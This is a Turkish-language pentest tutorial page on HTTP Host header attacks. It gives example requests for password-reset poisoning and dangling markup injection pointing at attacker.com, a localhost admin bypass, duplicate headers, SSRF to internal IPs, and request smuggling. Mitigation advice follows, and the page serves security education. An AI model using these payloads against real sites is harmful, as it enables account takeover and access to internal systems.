🖥️
Siber Güvenlik Notları
  • WHOAMI
    • 👨‍💻Who Am I?
  • 🔭Information Gathering
    • Pentest VM Setup
    • Passive Information Gathering
    • Subdomain Enumeration
    • Host Discovery
    • Port Scanning
    • Email Enumeration
    • Leaked Passwords
    • Zafiyet Araştırma
  • 🪟Windows Pentesting
    • Windows Privilege Escalation
    • Windows Persistence
    • Windows Lateral Movement
    • AV Evasion
  • 🐧Linux Pentesting
    • Linux Privilege Escalation
    • Linux Persistence
    • Linux Lateral Movement
  • 🕸️Web Application Pentesting
    • Web Pentest Checklist
    • SQL Injection
    • NoSQL Injection
    • OS Command Injection
    • XXE Injection
    • SSTI
    • XSS
    • CSRF
    • SSRF
    • LFI/RFI
    • Insecure Deserialization
    • CORS Misconfiguration
    • Directory Traversal
    • File Upload
    • Broken Authentication
    • Broken Access Control
    • Business Logic
    • Race Conditions
    • Web Cache Deception
    • AWS Testing
    • Web Cache Poisoning
    • Clickjacking
    • API Testing
    • Broken Link Hijacking
    • HTTP Request Smuggling
    • LLM
    • HTTP Host Header Attack
    • OAuth Zafiyetleri
    • GraphQL API
    • HTTP Parameter Pollution
    • Configuration and Deployment Management Testing
    • Information Disclosure
    • Prototype pollution
    • JWT
  • 🖲️Network Service Pentesting
    • 📘Active Directory Services
      • Bleeding Edge Vulns
      • Misconfigs
      • Domain Trust
      • DNS (53)
      • Kerberos (88)
      • LDAP (389,636)
      • RPC WMI (135)
      • SMB (445)
      • WinRM - 5985
    • 📂FTP - 21
    • 🔐SSH - 22
    • 🤣Telnet - 23
    • SMTP - 25
    • TFTP - 69 UDP
    • HTTP - 80,443
      • Apache
      • Joomla
      • Drupal
      • Wordpress
      • WEBDAV
      • PHP
      • Laravel
    • IMAP/POP3 - 110,143,993,995
    • SNMP - 161
    • Rservices - 512
    • IPMI - 623
    • Rsync - 873
    • MSSQL - 1433
    • Oracle TNS - 1521
    • NFS - 2049
    • Docker
    • Grafana - 3000
    • MySQL - 3306
    • RDP - 3389
    • Postgresql - 5432
    • Redis - 6379
    • JDWP - 8000
    • MongoDB - 27017
  • 🕸️Network Pentesting
    • ARP Poisoning
  • 📞Android Pentesting
    • Android Derleme Süreci
    • Reversing
    • Rooting
    • Burp Suite Sertifikası
    • SSL Pinning Bypass
    • Patching
    • MobSF Kurulumu
    • Flutter Pentesting
  • 📰Teori
    • Güvenlik Ürünleri
    • OSI
    • Security Principles
  • Diger
    • Hacking Gadgets
      • Wifi Pineapple
      • Pwnagotchi
    • Stego
    • Buffer Overflow
    • Phishing
    • Nessus
    • DDOS Attacks
    • MSFConsole
  • ⏪Reverse
    • GCC Reverse
    • Python Reverse
    • Flare VM
    • Remnux
  • 🛜Wireless Pentesting
    • Wireless Pentest
    • Wireless V2
Powered by GitBook
On this page
  • Host Header Attack Nedir?
  • Yöntemler
  • E-posta ve Parola Sıfırlama İstekleri
  • Authentication Bypass
  • Double Host Header
  • Host Header SSRF
  • Host Header Request Smuggling
  • Dangling Markup Injection
  • Örnekler
  • Kaynaklar

Was this helpful?

  1. Web Application Pentesting

HTTP Host Header Attack

PreviousLLMNextOAuth Zafiyetleri

Last updated 14 days ago

Was this helpful?

Host Header Attack Nedir?

  • HTTP Host başlığının amacı, istemcinin hangi back-end bileşeniyle iletişim kurmak istediğini belirlemeye yardımcı olmaktır.

  • HTTP Host header saldırıları, Host header değerini güvenli olmayan bir şekilde işleyen savunmasız web sitelerinden yararlanır. Sunucu Host başlığına güveniyorsa ve bunu düzgün bir şekilde doğrulamaz ise bir saldırgan bu girdiyi sunucu tarafı davranışını manipüle eden zararlı payload'lar enjekte etmek için kullanabilir.

Yöntemler

E-posta ve Parola Sıfırlama İstekleri

Eğer parola sıfırlama adresleri host header kullanılarak oluşturuluyor ise kullanıcı linke tıkladığında sıfırlama tokenini ele geçirebiliriz.

POST /reset-password HTTP/1.1
Host: attacker.com

Authentication Bypass

Eğer admin paneli localhosttan gelen isteklerde bazı panellere erişim izni veriyor ise host header ile erişim alabiliriz.

GET /admin HTTP/1.1
Host: localhost

Double Host Header

Eğer site host header değiştiğinde hata veriyorsa ikinci host header geldiğinde hata vermeyebilir. Bu durumda host header yansıyorsa saldırı deneyebiliriz.

GET / HTTP/1.1
Host: example.com
Host: attacker.com

Host Header SSRF

Eğer host alanı iç ağlara istek atmamızı sağlıyorsa ssrf saldırısı gerçekleştirebiliriz.

GET / HTTP/1.1
Host: 192.168.0.1

Eğer üstteki metod işe yaramıyor ise alttaki şekilde denenebilir. Bu zafiyet url parse işlemi hatalı yapılıyor ise çıkar.

GET https://example.com/ HTTP/1.1
Host: 192.168.0.1

Host Header Request Smuggling

Aşağıdaki iki isteği single-connection olarak yolladığımızda ikinci istekte yanıt geliyor.

GET / HTTP/1.1
Host: example.com
Connection: keep-alive

GET /admin HTTP/1.1
Host: 192.168.0.1
Connection: close

Dangling Markup Injection

POST /reset-password HTTP/1.1
Host: example.com:'<a href="//attacker.com/?

Örnekler

  • Tam URL'ler kullanmanız gerektiğinde, geçerli domain'in bir yapılandırma dosyasında manuel olarak belirtilmesini ve Host başlığı yerine bu değere başvurulmasını zorunlu kılmalısınız. Bu yaklaşım, örneğin parola sıfırlama zehirlenmesi tehdidini ortadan kaldıracaktır.

  • Host başlığını kullanmanız gerekiyorsa, doğru şekilde doğruladığınızdan emin olun. Bu, izin verilen alan adlarının bir beyaz listesine karşı kontrol edilmesini ve tanınmayan ana bilgisayarlar için herhangi bir isteğin reddedilmesini veya yönlendirilmesini içermelidir.

  • Özellikle X-Forwarded-Host gibi bu saldırıları oluşturmak için kullanılabilecek ek başlıkları desteklemediğinizi kontrol etmeniz de önemlidir.

  • İç altyapıya yönelik yönlendirme tabanlı saldırıları önlemek için load balancer'ınızı veya reverse proxy'lerinizi istekleri yalnızca izin verilen alan adlarından oluşan bir beyaz listeye yönlendirecek şekilde yapılandırmalısınız.

  • Virtual hosting kullanırken, yalnızca dahili web sitelerini ve uygulamaları genel kullanıma açık içerikle aynı sunucuda barındırmaktan kaçınmalısınız. Aksi takdirde saldırganlar Host başlığı manipülasyonu yoluyla dahili alan adlarına erişebilir.

Kaynaklar

Portswigger Academy:

🕸️
https://portswigger.net/web-security/host-header